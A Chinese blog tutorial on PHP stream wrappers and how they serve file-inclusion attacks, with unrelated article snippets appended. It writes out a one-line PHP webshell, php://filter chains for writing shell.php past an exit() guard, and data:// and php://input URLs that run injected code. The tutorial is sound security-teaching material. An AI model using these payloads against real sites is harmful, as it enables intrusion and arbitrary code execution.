PHP伪协议详解-程序员宅基地

技术标签: Web安全  php  

PHP伪协议详解

php支持的伪协议

1 file:// — 访问本地文件系统
2 http:// — 访问 HTTP(s) 网址
3 ftp:// — 访问 FTP(s) URLs
4 php:// — 访问各个输入/输出流(I/O streams)
5 zlib:// — 压缩流
6 data:// — 数据(RFC 2397)
7 glob:// — 查找匹配的文件路径模式
8 phar:// — PHP 归档
9 ssh2:// — Secure Shell 2
10 rar:// — RAR
11 ogg:// — 音频流
12 expect:// — 处理交互式的流

1 php://filter

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。

简单通俗的说,这是一个中间件,在读入或写入数据的时候对数据进行处理后输出的一个过程。

php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。

协议参数

名称 描述
resource=<要过滤的数据流> 这个参数是必须的。它指定了你要筛选过滤的数据流。
read=<读链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
write=<写链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
<;两个链的筛选列表> 任何没有以 read=write= 作前缀 的筛选器列表会视情况应用于读或写链。

常用:

php://filter/read=convert.base64-encode/resource=index.php
php://filter/resource=index.php

利用filter协议读文件±,将index.php通过base64编码后进行输出。这样做的好处就是如果不进行编码,文件包含后就不会有输出结果,而是当做php文件执行了,而通过编码后则可以读取文件源码。

而使用的convert.base64-encode,就是一种过滤器。

过滤器

字符串过滤器

该类通常以string开头,对每个字符都进行同样方式的处理。

string.rot13

一种字符处理方式,字符右移十三位。

string.toupper

将所有字符转换为大写。

string.tolower

将所有字符转换为小写。

string.strip_tags

这个过滤器就比较有意思,用来处理掉读入的所有标签,例如XML的等等。在绕过死亡exit大有用处。

转换过滤器

对数据流进行编码,通常用来读取文件源码。

convert.base64-encode & convert.base64-decode

base64加密解密

convert.quoted-printable-encode & convert.quoted-printable-decode

可以翻译为可打印字符引用编码,使用可以打印的ASCII编码的字符表示各种编码形式下的字符。

压缩过滤器

注意,这里的压缩过滤器指的并不是在数据流传入的时候对整个数据进行写入文件后压缩文件,也不代表可以压缩或者解压数据流。压缩过滤器产生命令行工具如 gzip的头和尾信息。只是压缩和解压数据流中的有效载荷部分。

用到的两个相关过滤器:zlib.deflate(压缩)和 zlib.inflate(解压)。zilb是比较主流的用法,至于bzip2.compressbzip2.decompress工作的方式与 zlib 过滤器大致相同。

加密过滤器

mcrypt.*mdecrypt.*使用 libmcrypt 提供了对称的加密和解密。

更多妙用:https://www.leavesongs.com/PENETRATION/php-filter-magic.html

利用filter伪协议绕过死亡exit

什么是死亡exit

死亡exit指的是在进行写入PHP文件操作时,执行了以下函数:

file_put_contents($content, '<?php exit();' . $content);

亦或者

file_put_contents($content, '<?php exit();?>' . $content);

这样,当你插入一句话木马时,文件的内容是这样子的:

<?php exit();?>

<?php @eval($_POST['snakin']);?>

这样即使插入了一句话木马,在被使用的时候也无法被执行。这样的死亡exit通常存在于缓存、配置文件等等不允许用户直接访问的文件当中。

base64decode绕过

利用filter协议来绕过,看下这样的代码:

<?php

$content = '<?php exit; ?>';

$content .= $_POST['txt'];

file_put_contents($_POST['filename'], $content);

当用户通过POST方式提交一个数据时,会与死亡exit进行拼接,从而避免提交的数据被执行。

然而这里可以利用php://filter的base64-decode方法,将$content解码,利用php base64_decode函数特性去除死亡exit。

base64编码中只包含64个可打印字符,当PHP遇到不可解码的字符时,会选择性的跳过,这个时候base64就相当于以下的过程:

<?php

$_GET['txt'] = preg_replace('|[^a-z0-9A-Z+/]|s', '', $_GET['txt']);

base64_decode($_GET['txt']);

所以,当$content 包含 <?php exit; ?>时,解码过程会先去除识别不了的字符,< ; ? >和空格等都将被去除,于是剩下的字符就只有phpexit以及我们传入的字符了。由于base64是4个byte一组,再添加一个字符例如添加字符’a’后,将’phpexita’当做两组base64进行解码,也就绕过这个死亡exit了。

这个时候后面再加上编码后的一句话木马,就可以getshell了。

strip_tags绕过

这个<?php exit; ?>实际上是一个XML标签,既然是XML标签,我们就可以利用strip_tags函数去除它,而php://filter刚好是支持这个方法的。

但是我们要写入的一句话木马也是XML标签,在用到strip_tags时也会被去除。

注意到在写入文件的时候,filter是支持多个过滤器的。可以先将webshell经过base64编码,strip_tags去除死亡exit之后,再通过base64-decode复原。

php://filter/string.strip_tags|convert.base64-decode/resource=shell.php

更多绕过方法:file_put_content和死亡·杂糅代码之缘

2 data://

数据流封装器,以传递相应格式的数据。可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。

示例用法:

1data://text/plain,
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
 
2data://text/plain;base64,
http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

范例

Example #1 打印 data:// 的内容

<?php
// 打印 "I love PHP"
echo  file_get_contents ( 'data://text/plain;base64,SSBsb3ZlIFBIUAo=' );
?>

Example #2 获取媒体类型

<?php
$fp    =  fopen ( 'data://text/plain;base64,' ,  'r' );
$meta  =  stream_get_meta_data ( $fp );

// 打印 "text/plain"
echo  $meta [ 'mediatype' ];
?>

3 file://

用于访问本地文件系统,并且不受allow_url_fopen,allow_url_include影响
file://协议主要用于访问文件(绝对路径、相对路径以及网络路径)
比如:http://www.xx.com?file=file:///etc/passsword

4 php://

在allow_url_fopen,allow_url_include都关闭的情况下可以正常使用
php://作用为访问输入输出流

5 php://input

php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。

例如:
http://127.0.0.1/cmd.php?cmd=php://input
POST数据:<?php phpinfo()?>
注意:
当enctype="multipart/form-data"的时候 php://input` 是无效的

遇到file_get_contents()要想到用php://input绕过。

6 zip://

zip:// 可以访问压缩包里面的文件。当它与包含函数结合时,zip://流会被当作php文件执行。从而实现任意代码执行。

zip://中只能传入绝对路径。
要用#分隔压缩包和压缩包里的内容,并且#要用url编码%23(即下述POC中#要用%23替换)
只需要是zip的压缩包即可,后缀名可以任意更改。
相同的类型的还有zlib://和bzip2://

在这里插入图片描述

参考链接:

php伪协议实现命令执行的七种姿势

PHP伪协议总结

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/120695429

智能推荐

ubuntu打开txt文档乱码及解压缩中文乱码解决方法_ubuntu txt中文乱码-程序员宅基地

文章浏览阅读569次。在命令行输入:gsettings set org.gnome.gedit.preferences.encodings auto-detected "['GB18030', 'GB2312', 'GBK', 'UTF-8', 'BIG5', 'CURRENT', 'UTF-16']"gsettings set org.gnome.gedit.preferences.encodings shown..._ubuntu txt中文乱码

MATLAB生成正弦波-程序员宅基地

文章浏览阅读1w次。要求:选定采样频率,生成不同频率的正弦波程序:f1=100;%生成正弦波的频率fs=1000;%采样频率N=100;%采样点数n=0:N-1;t=n/fs;%时间序列y=sin(2*pi*f1*t);plot(t,y);%画图在采样频率不变的前提下,更改f1的值就可以生成不同频率的正弦波。转载于:https://www.cnblogs.co..._用matlab生成一个正弦波

XML —— Java 操作 XML 工具包( JDOM&DOM4J )-程序员宅基地

文章浏览阅读307次。1. JDOM 引入JDOM 是一种使用 XML(标准通用标记语言下的一个子集) 的独特 Java 工具包,用于快速开发 XML 应用 程序。集合DOM和 SAX的优点需要引入jar包JDOM 官方网站:http://www.jdom.org/小缺陷:生成文档不会格式化,需要手动格式化 (ctrl+shift+F)import java.io.Fil..._xmlutil4jdom依赖包

百度地图导航路线起点、终点、途经点删除的方法_百度地图坐标提取位置保留一个点其余点删除怎么弄-程序员宅基地

文章浏览阅读1.1w次,点赞2次,收藏4次。最近使用百度地图做项目时,需要利用百度地图的导航路线画两个收费站的车流路线图、因为要用不同颜色表示车流量的大小。所以要先利用百度地图的导航功能找到路路线,再覆盖折线,从而设置不同的颜色、为了更准确的找到两个收费站的路线,添加了收费站间的途经收费站、导航出来的路线就出现了很多百度自带的起点、终点、途经点的标注,导致折线图不能完全覆盖,所以要去掉所有的百度地图自带的标注,网上找了很多资料没说怎么去掉途_百度地图坐标提取位置保留一个点其余点删除怎么弄

自定义适配器重写getView()方法和setTag()、getTag()的理解。_请简述自定义适配器需要重写的方法有哪些作用分别是什么-程序员宅基地

文章浏览阅读2.5k次。MyAdapter自定义适配器继承BaseAdapter,需要重写BaseAdapter的方法,最主要的是getView(int position, ViewconvertView, ViewGroup parent)这个方法。convertView机制总结:初次加载进入屏幕的convertView是空的,所以每次显示一个item都会调用一个getView(),此时的convertView还是_请简述自定义适配器需要重写的方法有哪些作用分别是什么

HTML中的CSS是什么百度百科,css框架-程序员宅基地

文章浏览阅读428次。CSS框架是预先准备好的软件框架,允许使用层叠样式表语言更容易,更符合标准的进行网页设计。大多数这些框架包含至少一个栅格设计(grid)。功能更强大的框架,还配备了更多的功能和附加的基于JavaScript的功能,但大多设计导向的和Unobtrusive JavaScript。本文从功能和充分的JavaScript框架区分它们。两个显着和广泛应用例子是Bootstrap和Foundation (f..._html的css

随便推点

Java自学习day15-面对对象下总结(关键字static、单例模式、main()使用说明、类的结构:代码块)-程序员宅基地

文章浏览阅读123次。static:静态的1.可以用来修饰的结构:主要用来修饰类的内部结构属性、方法、代码块、内部类2.static修饰属性:静态变量(或类变量)2.1 属性,是否使用static修饰,又分为:静态属性 vs 非静态属性(实例变量) 实例变量:我们创建了类的多个对象,每个对象都独立的拥一套类中的非静态属性。当修改其中一个对象中的非静态属性时,不会导致其他对象中同样的属性值的修改。 静态变量:我们创建了类的多个对象,多个对象共享同一个静态变量。当通过某一个对象修改静态变量时,

Linux下的signal信号机制_sigio信号如何触发-程序员宅基地

文章浏览阅读531次。在Linux中,要发送一个信号相当容易。程序员需要知道两个信息:要发送哪个信号,将这个信号发送给哪个进程。可以用 man 7 signal 找到一个可以利用的信号的列表。用户可以只将信号发送给用户自己的进程,也可以以root身份运行从而将信号发送给任意一进程。 Source:[cpp] view plaincopyprint?#include #include_sigio信号如何触发

CSS3-程序员宅基地

文章浏览阅读96次。CSS3https://www.mycodes.net 源码之家 建议收藏1、什么是CSS1.1、什么是CSS?Cascding Style Sheet 层叠级联样式表CSS:表现(美化网页):字体、颜色、边距、高度、宽度、背景图片、网页浮动…1.2、发展史CSS1.0CSS2.0 DIV(块)+CSS ,HTML与CSS结构分离的思想,网页变得简单CSS2.1 浮动、定位CSS3.0 圆角、阴影、动画… 、浏览器兼容性1.3、快速入门建议使用这种规范:<!DOCT

mybatis plus 插入数据库记录主键手动插入_idtype.input-程序员宅基地

文章浏览阅读1.6w次,点赞3次,收藏16次。mybatis plus在插入记录时,有以下几种方法boolean insert(T var1);boolean insertAllColumn(T var1);boolean insertBatch(List&lt;T&gt; var1);boolean insertBatch(List&lt;T&gt; var1, int var2);boolean insertOrUp..._idtype.input

【已解决】Jetbrain IntelliJ IDEA: 2019.2.1没有webservices, generate java code from wsdl_idea没有webservice client-程序员宅基地

文章浏览阅读1w次,点赞2次,收藏7次。Jetbrain IntelliJ IDEA没有webservices, generate java code from wsdlJetbrain IntelliJ IDEA: 2019之后的版本 无法像2018版一样通过右键项目根目录->webservice->generate java code from wsdl的方法来从webservice自动生成java代码。右键找不到webservice。解决方案file ->new -> modules -> java/we_idea没有webservice client

初识Toast_toast.setgravity 会有偏移动画-程序员宅基地

文章浏览阅读450次。认识一下Toast的几种使用方式,顺便巩固一下知识。一、首先明确一下什么是Toast:1.Toast是一种提供给用户简洁提示信息的视图2.该视图以浮于应用程序之上的形式呈现给用户。Toast提示界面不获取焦点,所以不影响用户的操作。Toast提示就是在不影响用户使用程序的同时,给用户提供某些提示信息。有两个例子就是音量控制,保存设置,或者退出。3.Android提供的Toast类可_toast.setgravity 会有偏移动画

推荐文章

热门文章

相关标签